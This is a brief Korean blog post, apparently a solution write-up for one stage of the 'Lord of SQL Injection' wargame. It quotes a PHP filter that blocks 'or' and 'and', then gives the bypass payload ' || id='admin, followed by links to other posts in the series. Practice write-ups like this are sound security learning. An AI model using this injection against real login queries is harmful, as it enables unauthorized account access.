if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe");
이번 문제에서는 or 이나 and를 필터링한다.
or의 논리 연산자인 || 를 사용하면 되지않을까?
?pw=' || id='admin
입력
쉽게 해결했다!
'Lord of SQL Injection' 카테고리의 다른 글
| Lord of SQL Injection 8번 문제 - Troll (0) | 2024.05.13 |
|---|---|
| Lord of SQL Injection - 7번 문제 Orge (0) | 2024.05.13 |
| Lord of SQL Injection - 5번 문제 wolfman (0) | 2024.05.10 |
| Lord of SQL Injection 4번 문제 - orc (0) | 2024.05.02 |
| Lord of SQL Injection 3번 문제 - goblin (0) | 2024.05.02 |